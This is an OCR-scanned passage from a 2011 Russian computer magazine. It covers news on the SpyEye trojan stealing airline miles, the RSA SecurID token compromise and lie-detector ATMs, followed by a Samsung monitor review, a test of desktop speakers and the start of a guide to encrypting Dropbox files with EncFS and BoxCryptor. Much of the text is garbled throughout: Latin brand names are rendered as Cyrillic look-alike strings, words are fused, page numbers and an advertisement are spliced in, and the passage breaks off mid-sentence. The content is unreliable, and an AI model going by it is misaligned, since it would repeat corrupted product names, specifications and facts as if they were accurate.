дбд.пі . Кстати, интересно, возможно ли вообще 
отсканировать код смартфоном, ведь диаметр 
монеты составляет всего 33 мм, а код раз- 
мещается на площади меньше квадратного 
сантиметра. 



► 014 
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8РУЕУЕ ВОРУЕТ БОНУСНЫЕ мили 




Чего только внашиднине крадут трояны — всевозможные пароли и 
логины, данные банковских карт, ключи от электронных кошельков и 
множество других приватных данных. Но недавно обнаружилось, что 
воруюттеперь даже бонусные мили, начисляемые многими авиа- 
компаниями. Странность приметили зесигііу-специалисты из фирмы 
Тгизіеег: они обнаружили, что популярный вредонос БруЕуе весьма 
успешно пытается «увести» данные с сайтов Аіг ВегИп и АігРІиз. 

В случае АігРІи 5 все было довольно банально: загрузка страницы 
перехватывалась, на сайт добавлялась строка «номер банковской 
карты», и полученные таким образом данные переправлялись 
злоумышленникам. А вот с Аіг ВегИп вышло интереснее: малварь 
ориентировалась на сбор информации с аккаунтов, но целью атаки 
оказалась добыча миль налета постоянных клиентов. Каким образом 
хакеры собирались (или собираются) получить с этого деньги, пока не 
понимают даже в Тгизіеег. 



» Стали известны даты проведения «СІіаоз Соп$(гисІіоп$ 2011». 11-й по 
счету фест традиционно состоится в последние выходные лета - 27 и 28 
августа, в Санкт-Петербурге. 



ДЕТЕКТОРЛЖИ в БАНКОМАТЕ 



Первое апреля уже давно миновало, поэтому, 
признаемся — сходу воспринять эту новость 
серьезно у нас не получилось. Стало известно, 
что российский Сбербанкзанят разработкой 
и тестированием нового вида банкоматов со 
встроенным полиграфом. В народе данный при- 
бор именуется детектором лжи. Ожидается, что 
такие машины будуториентированы на выдачу 
потребительских кредитов гражданам и смогут 
проверятьлюдей, ранее не обращавшихся в 
Сбербанк, по всей строгости. Банкоматоснастят 



устройством для сканирования паспортов, ска- 
нером отпечатков пальцев и всем необходимым 
для снятия биометрической картинки лица. 
Роль детектора лжи, в свою очередь, будет 
играть специальная технология голосового 
анализа, разработанная Центром Речевых 
Технологий (ЦРТ). Человеку, желающему по- 
лучить кредит, будут заданы вопросы вроде 
«работаете ли вы?» и «есть ли у вас другие 
непогашенные задолженности на данный 
момент?», а правдивость ответов тщательно 



проанализирует упомянутая технология. Таким 
образом, решение по кредиту будет прини- 
маться на основании данных о нервозности и 
эмоциональном состоянии заявителя. А ведь 
даже гораздо более серьезные стехнической 
точки зрения полиграфы несовершенны, да 
и специалисты по фонетике считают подоб- 
ные методы шарлатанством... Тем не менее, 
Сбербанкуже планируетустановить новые 
банкоматы в торговых центрах и отделениях 
банка по всей стране. 



К8А НАКОНЕЦ ПРИЗНАЛА КОМПРОМЕТАЦИЮ 8ЕС0КІ0 



Р5А 5ес и гТу заменит каждый из 40 миллионов токенов ЗесигІО, 
используемых сейчас, из-за атаки атаки хакеров, произошедшей в 
марте. Подразделение ЕМС на конец выпустило письмо для клиентов, 
в котором объясняет, что ЗесигІО не удалось защитить корпорацию 
ЕоскЬеесІ МагОп (производитель самолетов-истребителей Е-22 и 
Е-35), которую пытались взломать. ЗесигІО — токен, который исполь- 
зуется при двухфакторной аутентификации. Каждый пользователь- 
ский аккаунт привязан ктокену, каждый токен генерирует псевдо- 
случайное число, которое меняется периодически, обычно каждые 
30 или 60 секунд. Для входа в компьютерную систему пользователю 
необходимо ввести нетолько имя и пароль, но и число, которое по- 
казываеттокен в текущий момент. Сервер аутентификации знает, 
какой токен какое число должен показывать в эту секунду, и таким 
образом может определить подлинность владельца имени и пароля. 
Нынешнее признание ЕЗА противоречит начальным заявлениям о 
том, что взлом не позволит выполнить «прямые атаки» на ЗесигІО, 



полная замена всех токенов фактически означает признание того, 
что в настоящий момент они не обеспечивают той безопасности, 
которую клиенты предполагают. Источники внутри ЕЗА говорят о 
том, что в результате мартовского взлома компания потеряла базу 
начальных значений, а алгоритм и так был известен ранее. Результат 
— токены ЗесигІО не способны защитить от хакеров, по крайней мере 
оттех, которые осуществили взлом РЗА в марте. Для них ЗесигІО не 
больше, чем несложное дополнение простой парольной аутентифи- 
кации, уязвимой ко всем кейлоггерам и повторному использованию 
паролей. 




Еще больше новостей науіі уѵѵѵ.хакер.ги 
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РЕКРим 



01 ^ 



Александр Михее 



а 



I 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Диагональ дисплея: 27" 

Максимальное разрешение: 1920x1080 точек 

Тип матрицы: ТРТ ТЫ 

Яркость: 300 кд/м 2 

Контрастность: 1000:1 

Время отклика: 3 мс 

Интерс|эейсы: компонентный, РЗ-45, 2х УБВ 2.0, 
2х НОМІ, антенный вход, слот для САМ-модуля, 
оптический аудиовыход, ЬеасІрЬопе 
Вес: 6,2 кг 




Тестирование монитора Затзипд 8упсМа$1егТ27А950 



ЖК-мониторы давно перестали быть чем-то необычным, 
а их огромных СРТ-предшественников редко встретишь у 
кого-нибудь в квартире (если только у трушных дизайнеров). 
Неудивительно, ведь покупка ЖК более не бьет по карману, как 
серп знаете по чему, и выбор практически неограничен — при- 
лавки прямо-таки ломятся от дьявольски схожих моделей. С 
одной стороны, это помогает не заморачиваться при подборе 
одной такой себе в пользование, с другой — нагоняет тоску, 
когда хочется, чтобы новый монитор отличался от старого хоть 
чем-то, кроме диагонали. 

Казалось бы, а что тут придумаешь? Воткнул кабель от ком- 
пьютера — увидел картинку. Надел очки — изображение стало 
объемным. Вот, можно сказать, и побаловался новой игрушкой, 
остается только ждать покупки следуюідей. Но процесс знаком- 
ства с только что распакованным монитором может радовать 
и занимать гораздо больше времени, если этот монитор — 
Батзипд БупсМазІег Т27А950. Впрочем, обо всем по порядку. 

Стильный гигант 

Из солидной прямоугольной подставки плавно «вырастает» 
тонкий корпус экрана. Тонкий, но очень большой — диаго- 
наль монитора составляет 27 дюймов. Трудно не заметить, что 
Батзипд БупсМазІег Т27А950 сильно отличается внешним 



видом от многих своих собратьев. Монитор производит впе- 
чатление устройства, попавшего к нам прямиком из будуідего. 
Дизайн довольно строгий, нет лишних, отвлекаюідих деталей. 
Подставка устройства только с первого взгляда кажется просто 
подставкой. Во-первых, с тыльной стороны гнездится целая рос- 
сыпь всевозможных разъемов, подробнее о которых мы расска- 
жем чуть позже. Во-вторых, там прячутся «мозги» монитора. При 
включении даже можно услышать, как «просыпается» вентиля- 
тор в подставке. Благо, потом система охлаждения затихает. 

Из ряда вон 

При включении сразу бросилось в глаза сомнительное решение 
производителей — глянцевая поверхность экрана. Это не так 
страшно на ноутбуке с диагональю дисплея 14 дюймов, но когда 
речь идет о 27 дюймах, то в итоге мы получаем в буквальном 
смысле большое зеркало с завидной отражаюідей способностью. 
Хотя девочкам краситься будет удобно. Однако отражение и 
блики от дисплея компенсируются прекрасной цветопередачей 
и цветовым охватом. Сразу же стоит предупредить, что ты не 
найдешь здесь ни привычного ВѴІ-В, ни еіде более знакомого 
В-5иЬ. Есть только НВМІ, причем сразу два, поэтому ты сможешь 
подключить монитор одновременно к компьютеру и, например, 
ВВ-плееру. Когда они оба не смогут развеять твою тоску, ты 
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Цветовой охват на зависть многим собратьям-мониторам Герой сегодняшнего теста берет не только количеством 

с|эункций, но и замечательным качеством цветопередачи 



можешь ПОДКЛЮЧИТЬ к Затзипд ЗупсМазІег Т27А950 антен- 
ный кабель и посмотреть матч любимой команды, новости или 
музыкальный канал. Проверяя электронную почту, ты не пропу- 
стишь начало важной передачи, если воспользуешься функцией 
« ка рти н ка - в - ка рти н ке». 

На случай, если стандартный набор отечественных каналов тебя 
не прельидает, самым лучшим решением будет подключение 
цифрового ТВ с помоидью имеюидегося у Затзипд ЗупсМазІег 
Т27А950 САМ-модуля. 

Мы все еще^ говорим 
о мониторе? 

Все это очень хорошо, да только это совсем еиде не все. Трудно 
не заметить наличие популярного в последнее время среди 
мониторов разъема П5В 2.0. До тех пор, пока ты не подключил 
туда флешку или внешний жесткий диск, ты мог бы подумать, 
что это просто старый добрый хаб. Однако высветившее- 
ся меню развеет твои наивные предположения и предложит 
открыть носитель и воспроизвести с него аудио-, фото- или 
видеоконтент. Как видишь, встроенным ТВ-тюнером не обо- 
шлось, Затзипд ЗупсМазІег Т27А950 также может справиться 
и с функциями медиаплеера. Но если это еиде и медиаплеер, 
то поддержки только ПБВ 2.0 было бы недостаточно. Соединить 
«мониторо-ТВ-плеер» с твоей локальной сетью можно с помо- 
идью отдельного ѴѴі-Рі-адаптера, который (ты угадал!) можно 
подключить в один из двух ОБВ-портов. Не забыт и старый 
добрый проводной способ передачи данных, ведь нет ничего 
пройде — воткнул кабель в Р^-45 и смотри кино. И это действи- 
тельно просто, потому что Батзипд БупсМазІег Т27А950 авто- 
матически настроит параметры сети и сможет воспроизводить 
контент из открытых сетевых папок. 

Не обошли этот монитор стороной и модные веянья в виде 
поддержки ЗВ. Причем не обязательно искать трехмерный кон- 
тент, его можно получить из твоих собственных видео и фото 
благодаря возможности конвертирования изображения из 20 
в ЗВ на лету (вот, оказывается, зачем вентилятор в подставке). 
Лицезреть же все это можно с помоидью прилагаюидихся затвор- 
ных очков. 



Меню Батзипд БупсМазІег Т27А950 большое, цветное и доволь- 
но подробное. Это неудивительно, ведь нужно охватить столько 
поддерживаемых функций. Управлять им можно как с помоидью 
сенсорных клавиш на передней панели экрана, так и с помо- 
идью пульта ДУ, который гораздо удобней в этом деле. Венчают 
список такие приятные мелочи, как автоматическая подстройка 
яркости и выключения подсветки или питания монитора, если 
его оставили в одиночестве. Это очень удобно, если ты тидатель- 
но бережешь электричество в доме. 

Методика тестирования 

Для определения цветопередачи монитора мы использовали 
колориметр Ваіасоіог БрубегЗЕІіІе, с помоидью которого произ- 
водился замер показателей цветопередачи в трех режимах: под 
нулевым углом, под углом 45 градусов и 60 градусов. Идеальной 
картиной считаются ровные, вытянутые в струну линии. 
Отклонение какой-либо из линий свидетельствует о нарушениях 
в цветопередаче. 

Также было интересно узнать и про цветовой охват устройства 
зРОВ. Сложная треугольная разноцветная фигура является цве- 
товым охватом глаза человека. Зеленый треугольник — зРОВ — 
цветовой охват, на отображение которого (в теории) рассчитано 
большинство мониторов. Красный треугольник — цветовой охват 
испытуемого монитора. Чем больше красный треугольник — тем 
лучше. 

Подводим итог 

Батзипд БупсМазІег Т27А950 — устройство, которое, безуслов- 
но, не будет обделено вниманием ввиду своего необычного 
дизайна и множества возможностей. Этот монитор прекрасно 
подойдет для создания в одной отдельно взятой комнате цело- 
го центра развлечений. С ним будет комфортно как работать и 
совершать какие-то повседневные задачи, так и отдыхать, что 
называется, от души. Вне зависимости от того, предпочитаешь 
ли ты фильмы высокого качества, цифровое ТВ, компьютерные 
игры, обработку фотографий или сериалы по обычным телеви- 
зионным каналам. ^ 



ХАКЕР 08 /1 51 / 201 1 



► 017 






РЕРким 



■ ■ Антон Николаев 



в ЗВУКАХ 
ВЫСОКИХ СФЕР 

Тестирование акустических систем формата 2.0 

О Прошли уже те времена, когда словосочетание «компьютерная 
акустика» вызывало ассоциации исключительно с убогими 
пластиковыми пищалками. Современные акустические наборы отлично 
решают самые частые задачи: прослушивание музыки, компьютерные 
игры и т.д. Про домашние кинотеарты не говорим - в сегодняшнем 
обзоре речь пойдет об акустике классического формата 2.0. 

Пробуем на вкус 

Спорить о вкусах — последнее дело. Да мы и не будем, в этом тестирова- 
нии перед нами стояла другая задача — определить, на что та или иная 
акустика способна в принципе. Не нарушая сложившуюся традицию, 
встречаем участников теста «по одежке». 

Во-первых, габариты. Они имеютне последнеезначение, ведьотних 
зависит, можно ли будет поставить купленные акустические системы 
на стол, без ущерба занять половину рабочего пространства, или же 
придется долго стоять в комнате, соображая, куда же пристроить эти 
чертовы колонки. 

Во-вторых, дизайн. Дизайн, кстати, это нетолько, и даже не столько 
симпатичный внешний вид (договорилисьже о вкусах не спорить), тут 
имеется в видутехническая сторона вопроса. Например, оттого, где и 
как на корпусах расположены регуляторы, будет в конечном счете зави- 
сеть удобство пользования. 

Ну и, конечноже, важен звук. Никаких поблажекдля сегодняшних 
участников не планировалось, поэтому тестовый материал мы подоб- 
рали самый суровый, неоднократно проверенный втестахдомашней и 
автомобильнойтехники, втом числе и класса ЫдЬ-епсІ. «Обязательную 
программу» составили диски, применяемые на автозвуковых соревно- 
ваниях, и один из лучших, на наш взгляд, «домашних» тестовыхдисков 
РосаІТооІз, безжалостно обнажающий все огрехи аппаратуры. 

Впрочем, мы были бы снобами, если бы этим дело и ограничилось, 
ведь в реальной-то жизни этой акустике предстоит играть музыку все 
же немного попроще. Поэтому в качестве «вольной программы» за- 
ранее была приготовлена целая стопка дисков, которые в ином случае 
вряд ли когда можно было бы увидеть воттак, вместе. В ней соседство- 
вали Агтіп Ѵап Виигеп со своими вертушками и плотным электронным 
ритмом и Вау Вгоѵѵп со своим контрабасом (между прочим, нетакой 
простой для воспроизведения инструмент, для теста качества баса 
подходиточень даже неплохо), ^аску^ со своими ядреными электро- 
гитарами (динамика и разборчивость средних частот) и В іа па Кгаіі со 
своим бархатным вокалом и шикарным аккомпанементом (проверка 
тонального баланса и качества воспроизведения средних и верхних 
частот). В общем, музыкальный материал на все случаи жизни. Чтоб уж 
без споров о вкусах. 



Тестовый ИСТОЧНИК: 

Автомобильный ОѴО-ресивер АІріпе ОѴА-9861РІ 
+ переходник 2РСАІО тіпі-іаск 

Тестовый материал: 

РосаІТооІз 

ІА5СА 0№сіаІ 5оипс1 Оиаіііу РеТегепсе СО 
АМТ 50 

Разножанровые сборники 

Список тестируемого оборудования: 

Сгеаііѵе 6іда\л/огк$ Т40 зегіез II 

ЕсітегС200 

ЕсітегР2000Т 

^В^^иеЛII 

МісгоІаЬНП 

5ѵеп ЗІгеапп Меда 

Трудности выбора 

В плане уровня звука за свою стоимость акустическая система 
МісгоІаЬВоІо 15 удостаивается награды «Лучшая покупка». А вот по- 
мимо идеального звучания, да еще и удобства пользования в придачу 
вне всякой конкуренции — Есіібег С200. Блочная конструкция и «лен- 
тяйка» в комплекте открываютзаманчивые возможности разместить 
акустику практически где душе угодно, не думая отом, придется ли 
тянуться или вскакивать с места, чтобы, например, прибавить или 
убавить громкость или переключить ее на другой источник. Одним 
словом, рекомендуем и награждаем акустическую систему призом 
«Выбор редакции». 
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Сгеаііѵѳ Оідаѵѵогкз 
Т40 зегіез ІТ 

Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: лих, разъем для док-станции Х-30 

ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: на наушники 
МОЩНОСТЬ: 2х16ВтРМ5 
ОТНОШЕНИЕ СИГНАЛ/ШУМ: 80 дБ 
БЛОК ПИТАНИЯ: внешний 
МАТЕРИАЛ КОРПУСОВ: пластик 
ГАБАРИТЫ: 325x180x90 мм 

■■■■■■■■□□ 

ОідаѵѵогкзТДО зегіез II напоминают серьезные на пол ьн и ки, только в 
миниатюре. В каждой из колонокустановлены два среднечастотника и 
одинтвитер между ними. Такое расположение динамиков обеспечивает, 
по задумке производителя, их лучшее согласование. Среднечастотники 
имеют диффузоры из плетеного стекловолокна. Этот материал, кстати, 
часто применяется в дорогой акустике. Дополнительная приятная фиш- 
ка — возможность подключения док-станции Сгеабѵе Воскіпд Эіабоп 
Х-30 для іРоб, разъем для нее расположен натыльной сторонеодной 
из колонок. Кстати, еслиутебя не іРоб, а другой плеер, то ты можешь 
подключить его кАІЭХ-входу, расположенному на лицевой стороне под 
регулятором громкости. 

Что касается звука, то глубокого баса и дискотечного ударного саунда от 
этой акустики можно не ждать, хотя на обычной музыке, включенной как 
ненавязчивый фон, особого дискомфорта нехватка баса не вызывает. 

А все благодаря тому, что средние частоты и верха звучат на редкость 
приятнодля своей цены и размеров. Звукчистый и легкий. Уэтой акусти- 
ки неплохая разрешающая способность, которая наверняка позволит 
услышать даже в знакомыхтреках новые подробности. 

+ Ясное и красивое воспроизведение средних и высоких частот. 

+ Возможность подключения док-станции для іРосі. 

+ Компактность. 

- Скромные басовые возможности. 



ЕсІіТіег С200 

Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: АЭХ 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: нет 
МОЩНОСТЬ: 2x25 Вт РМ5 
ОТНОШЕНИЕ СИГНАЛ/ШУМ: 85 дБ 
БЛОК ПИТАНИЯ: встроенный 
МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ:320х253х196 мм (АС), 223x218x72 (усилитель) 



Если ты мечтаешь о стереосистеме, но бюджет не позволяетзамахнуться 
на дорогую Ні-Рі-«домашку»,то обрати свое внимание на ЕсІібегС200. 
Во-первых, потому, что вы глядит а кустика великолепно и, безусловно, 
добавитярких нот в интерьер комнаты, куда будет установлена. Во-вто- 
рых, ЕсІібегС200 имеет блочную конструкцию — пассивныеакустичес- 
кие системы и отдельный усилитель судебным большим энкодером и 
ЕЕВ-индикатором, на который выводится уровень громкости или уровень 
низких/высоких частот. В комплекте идеточеньудобный ПДУ карточного 
типа, так что управляться с этой акустикой — одно удовольствие. Помимо 
обычного стереовхода, усилитель оснащен дополнительным входом АОХ, 
к нему можно подключить, к примеру, ВѴВ-ресивер, медиаплеер или же 
игровую приставку, и потом переключаться между источниками прямо с 
пульта. Каквидишь, сточки зрения эргономики, функционала и внешнего 
вида ЕсІібегС200 нетравных. 

Стехническойточки зрения всетоже сделано на высшемуровне. Корпуса 
колонок выполнены из МДФ и имеют качественное покрытие под черное 
дерево. Ободки вокруг динамиков — это не просто декор, а ихточеные 
фланцы, так что тут все серьезно, никаких имитаций. 

На конец звучит комплект очень интересно. Любители поддать баску на- 
верняка оценят низкочастотный потенциал акустики, причем с помощью 
регулятора тембра звук можно настроить, исходя из собственных пред- 
почтений. С другими жанрами ЕсІібегС200 (от дерзкого рока до мягкого, 
воздушного инструментала) справляется без проблем. В общем, в плане 
звука С200 можно назвать идеальным по «всеядности» комплектом. 

+ Качественный звук. 

+ Блочный дизайн, пульт дистанционного управления. 

- При полном отключении питания сбрасываются настройки 
громкости и тембра. 
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► 019 







РЕРким 




ЕсІіТіег Р2000Т 




^В^ ОиеІ III 




Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дублирующий 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: нет 
МОЩНОСТЬ: 2x30 Вт К М5 
ОТНОШЕНИЕ СИГНАЛ/ШУМ: 95 дБ 
БЛОК ПИТАНИЯ: встроенный 
МАТЕРИАЛ КОРПУСОВ: дерево 
ГАБАРИТЫ: 320x253x1 96 мм 

■■■■■■■■■□ 



Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: нет 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: нет 
МОЩНОСТЬ: 2x1 о Вт В М5 
ОТНОШЕНИЕ СИГНАЛ/ШУМ: 70 дБ 
БЛОК ПИТАНИЯ: внешний 
МАТЕРИАЛ КОРПУСОВ: пластик 
ГАБАРИТЫ: 304x1 17x1 17 мм 

■■■■■■■□□□ 



Акустические системы В2000Т хоть и не самые крупные в этом тесте, но 
имеютвсеже относительно приличные габариты, такчто квыбору места 
для ихустановки нужно отнестись с должным вниманием. Лучше найти 
им место на столе, потому как регулятор громкости и регуляторы тембра 
расположены на боковой панели одной из колонок. Ручки утоплены в 
корпус, так что мешаться, в случае чего, не будут. Материал корпусов — 
толстый МДФ, исключающий вибрации стенокдаже на приличной гром- 
кости. Это, кстати, довольно критично, потому как вибрирующие стенки 
— не что иное, как источник посторонних призвуков. Динамики в этой 
акустике применены точнотакиеже, что и в С200. Диффузоры 6,5-дюй- 
мовых басовиков изготовлены из целлюлозы с защитной пропиткой, 
одного из признанных «аудиофильских» материалов. Излучающие 
мембраны твитеров тканевые. 

Звучание Р2000Т абсолютно ненапряжное и подходит для любых ситу- 
аций и жанров, будьто фоновая легкая музыка, фильмы, игры или даже 
домашние вечеринки. Электронная музыка дается колонкам особенно 
хорошо. 

+ Качественные корпуса. 

+ Достойное звучание. 



Главная фишка акустических систем от Нагтап/Кагсіоп — необычный 
внешний вид. Дизайн этихсеребристых«бомбочек» наверняка придется 
по душе любителям всяких штучек в стиле хай-тек. Подзащитными 
сетками каждой колонки скрываются по одному совсем небольшому 
динамику (диаметром всегоДсм) с металлическими диффузорами сфе- 
рической формы. Они отвечают за воспроизведение всего частотного 
диапазона разом. Для того чтобы обеспечить адекватное звучание баса 
от столь малого излучателя, на тыльную сторону корпусов выведены 
порты фазоинверторов с переменным сечением. В этой акустике они 
сделаны не просто «для галочки», а реально обеспечиваютакустичес- 
кое усиление низких частот. Единственный регулятор, который есть на 
корпусе — это регулятор громкости. Не всякий найдет его сразу — роль 
«крутилки» выполняет верхний кругляш одной из колонок. 

Для своих размеров эта акустика неплохо басит, и при этом без какого- 
либо гудения на низких частотах. Звук, конечно, не как на мегаконцерте, 
но послушать электронную музыку или посмотреть киношку оченьдаже 
можно. Серединка и верха не самые натуральные, но, в общем, довольно 
ненапряжные, и при долгом прослушивании утомления не вызывают. 

+ Оригинальный внешний вид, компактность. 

- Нет регуляторов тембра. 

- Высоковата цена. 



► 020 
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МісгоІаЬ 5оІо 15 

Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дубл и ру ю щи й 
ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: нет 
МОЩНОСТЬ: 2x40 ВтРМ5 
ОТНОШЕНИЕ СИГНАЛ/ШУМ: 80 дБ 
БЛОК ПИТАНИЯ: встроенный 
МАТЕРИАЛ КОРПУСОВ: дерево 
ГАБАРИТЫ: 31 5x238x1 68 мм 




ьѵеп ьігѳат 
Меда 



Технические характеристики: 

ФОРМАТ: 2.0 

ДОПОЛНИТЕЛЬНЫЕ ВХОДЫ: дубл и рующи й вход 

ДОПОЛНИТЕЛЬНЫЕ ВЫХОДЫ: на наушники 

МОЩНОСТЬ: 2x60 Вт РМ5 

ОТНОШЕНИЕ СИГНАЛ/ШУМ: н/д 

БЛОК ПИТАНИЯ: встроенный 

МАТЕРИАЛ КОРПУСОВ: дерево 

ГАБАРИТЫ: 360x255x255 мм 



Поставив эту акустику себе на стол, ты сможешь с гордостью показывать 
ее своим друзьям. Глянцевые поверхности передних панелей выгля- 
дят просто шикарно, а точеные фланцы твитеров смотрятся на них как 
никогда уместно. Никаких защитных грилей тут нет, но, тем не менее, 
динамики все же защищены: на 13-сантиметровых басовиках натянута 
полупрозрачная сетка, а механической защитой высокочастотника слу- 
жит небольшая декоративная дужка. Регулятор громкости расположен на 
боковой стенке, но ручка утоплена, так что мешаться не будет. Регулято- 
ры тембра убраны на тыловую стенку корпуса: производитель, видимо, 
посчитал, что нечего их дергать постоянно — один раз отрегулировал и 
забыл. 

Звук этой акустики оченьхорош: открытые и чистые средние и верхние 
частоты; упругий, сочный и вибрирующий бас, не теряющийся на малой 
громкости и неуходящий в перегруз на большой; неплохая детальность, 
позволяющая без напряжения слышать тонкие нюансы знакомыхтреков. 
Самое ценное, что звучание Зоіо 1 5 не утомляет даже при длительном 
прослушивании. Акустика легко отыгрываетлюбыежанры отударного 
клуба до агрессивного рока или легкого инструментала, причем на любой 
громкости. 

+ качественный звук, симпатичный внешний вид 
- на глянцевой поверхности могут оставаться отпечатки пальцев 



■■■■■■■■■□ 

Эти акустические системы по своим размерам ближе к классическим «по- 
лочникам» домашнего Ні-Рі, чем к компьютерным «настольникам». И тем 
не менее, производитель явно позиционирует их для установки именно 
на стол — регуляторы громкости и тембра и разъем тіпі-іаск-выхода на 
наушники расположены на лицевой панели. Корпуса выполнены из МДФ, 
покрытие под благородный темный шпон придает им солидности и еще 
больше роднит с дорогой домашней техникой. Под съемными защитными 
грилями открываются полноценные 6,5-дюймовые басовые динамики. Их 
дис|эс|эузоры выполнены из целлюлозы с защитным покрытием. Знатоки 
особо ценят этот материал за отсутствие у него паразитных призвуков и, 
как следствие, возможность получить более правильное звучание. Твите- 
ры имеют мягкие тканевые мембраны. 

В плане звука Зі;геат Меда можно назвать универсальными. Серединка и 
верха воспроизводятся хоть и не на аудиофильском уровне, но довольно 
ровно и комфортно. Акустика не забирается глубоко вниз по частоте, но 
плотный ударный бас клубной музыки передает играючи (особенно, если 
поколдовать с эквалайзером программного плеера), и к тому же имеет не- 
дурной запас по громкости. Так что для любителей домашних вечеринок 
этот комплект — самое то. 

+ Солидный внешний вид. 

+ Приличный запас неискаженной громкости. 

- Габариты позволят поставить их далеко не на каждый стол. 



► 022 
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ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



Ш Мы знаем, где в мире найти самые лучшие продукты. 

Вы знаете, что можете найти их рядом, под маркой ТА5Н 



Реклама 




горЬох: синхронизация 
іаилов - просто, но небезопасно 



ѳ Пользователи ОгорЬох сохраняют миллион файлов каждые 5 
минут. Всего сервисом пользуются 25 миллионов человек. При зтом 
создатели не гарантируют неприкосновенность твоих данных, а 
система аутентификации уже давала сбой. 



Предыстория 

Девятнадцатого июня ОгорЬох устроил своеобразный «день откры- 
тых дверей». В течение 4 часов кто угодно могзайти в чужой аккаунт 
с помощью произвольного пароля. Создатели сервиса, возможно, 
даже и незаметили бы проблемы, если бы информацию обуязвимо- 
сти не опубликовал независимый зесигііу-исследователь [ разІеЬіп. 
сот/ѵВКѵѵРУбТ ). За последнее время это уже не первая щекотливая 
история, связанная с безопасностью файлов, которые пользователи 
со всего мира так охотно доверяют облачи ому хранилищу ОгорЬох. 
Тут надо напомнить, что с самого начала существования сервиса 
разработчики заверяли пользователей, что ответственно подходят к 
безопасности данных. Так, все файлы во время синхронизации пере- 
даются исключительно по защищенному 550-соединению, а хранят- 
ся на сервере в зашифрованном виде (АЕ5-256). Изменив недавно 
пользовательское соглашение, те же самые люди недвусмысленно 
дали понять, что лишь ограничивают доступ кфайлам для своихсо- 
трудников, но при появлении необходимости, втом числе по запросу 
правоохранительных органов, ОгорЬох непременно предоставит 
доступ каккаунтулюбого юзера. Воттакое шифрование. 
Янепараноики скрывать мне, в общем -то, нечего, но открывать 
кому-либо свои личные файлы мне совершенно не хочется. Ктомуже 
я всегда был не в восторге оттого, что данные в открытом виде лежат 



на каждом компьютере, который засинхронизирован с моим аккаун- 
том ОгорЬох. Самое время все это безобразие поправить. 

Поднимаем ЕпсР5 

Справедливости ради стоит сказать, что у сервиса есть официаль- 
ный ѵѵікі [ ѵѵікі.сІгорЬох.сопп ). где приведены конкретные советы по 
тюнингу безопасности. Железобетонная правда заключается втом, 
что данные необходимо шифровать на локальной машине, а в облако 
их передавать уже в закриптованном виде. В частности, предлагается 
разместить в папке ВгорЬох’а контейнер ТгиеСгурІ; или РгееОТРЕ и 
уже внутри него хранить все конфиденциальные документы. Метод 
действенный — не поспоришь: даже если аккаунт будет скомпроме- 
тирован, злоумышленник не сможет расшифровать данные. И все бы 
было хорошо, если не одно «но». Притоком подходе можно забыть о 
рациональной синхронизации файлов: при изменении любого до- 
кумента будетсинхронизироваться весь криптоконтейнер целиком, 
какого бы размера он ни был (например, 1 Гб). Ктомуже, в этом случае 
теряется важная опция ВгорЬох’а, позволяющая откатитьлюбые из- 
менения и вернуться кпроизвольной версии файла. Ксчастью, более 
изящное решение предлагается все втом же ѵѵікі — использовать 
Ые-Ьу-Ые- шифрование, то есть применять криптографию для каждого 
из файлов в отдельности. Для этого идеально подходит ЕпсР5, вирту- 
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Указываем парольную фразу для шифрования файлов 



альная криптографическая файловая система. При монтировании 
ЕпсРЗ указывается директория-источни к (исходная директория с за- 
шифрованными файлами, которая может располагаться в ОгорЬох’е) 
иточка монтирования. После монтирования каждому файлу в 
директории-точке монтирования соответствует определенный файл из 
зашифрованной директории. Таким образом, ты работаешь с файлами 
в открытом виде, а ЕпсРЗ прозрачно размеідаетихзашифрованные 
версии внутри ПгорЬох’а. Поскольку каждый файл криптуется в отдель- 
ности, ПгорЬох можетсинхронизировать изменения инкрементально 
для каждого из них. Это очень добротная технология, которая давно 
используется под Ыпих’ом и основана на технологии РПЭР (Рііезузіет 
іп Пзегзрасе), позволяюідей программистам создавать виртуальные 
файловые системы. Несмотря на свои корни, ее сейчас можно успешно 
использовать как под Мае 05 X, так и ѴѴіпсІоѵѵз. Начнем с последней. 

ѴѴіпсІоѵѵз 

После неприятной истории с системой авторизации ПгорЬох пред- 
приимчивые немецкие ребята оперативно зарелизили утилиту 
ВохСгурІог [ ѵѵѵѵѵѵ.ЬохсгѵрІог.сопп ]. которая создает в системе вирту- 
альный криптографический диск. Каждый помеіденный на него файл 
автоматически шифруется с использованием стандарта АЕ5-256. 
Физически зашифрованные данные размеідаются в произвольной 
директории, например, в папке ПгорЬох, в то время как на вирту- 
альном диске они находятся в открытом виде, и к ним без проблем 
можно обратиться из любого приложения. Разработчики поступили 
очень мудро и не стали изобретать велосипед, а просто реализовали 
основные возможности ЕпсЕЗ для использования под ѴѴіпсІоѵѵз. И 
пусть ВохСгурІог поддерживает пока не все возможности технологии, 
но этого вполне достаточно для надежной заідиты данных. 
Приложение после установки автоматически определяет папку, 
используемую ПгорЬох’ом, и предлагает разместить в ней директорию 
с зашифрованными файлами. Для шифрования данных тебе необхо- 
димо придумать парольную фразу, а также выбрать букву для диска, 
на котором будут располагаться файлы в открытом виде. Если ты не 
хочешь, чтобы данные без твоего ведома находились в открытом 
виде, пароль можно не сохранять и вводить его каждый раз, когда ты 
будешь монтировать диск. Поставив галку напротив «АЬѵапсесІ МоЬе», 
ты получишь доступ к некоторым тонким настройкам ВохСгурІог. Это в 
частности может потребоваться, если есть необходимость использо- 
вать возможность ПгорЬох’а для отката к предыдуідей версии файла. 
Дело в том, что ВохСгурІог по умолчанию шифрует и имена файлов, 
превраідая их в абракадабру, тем самым мешая работе системы верси- 



в I 

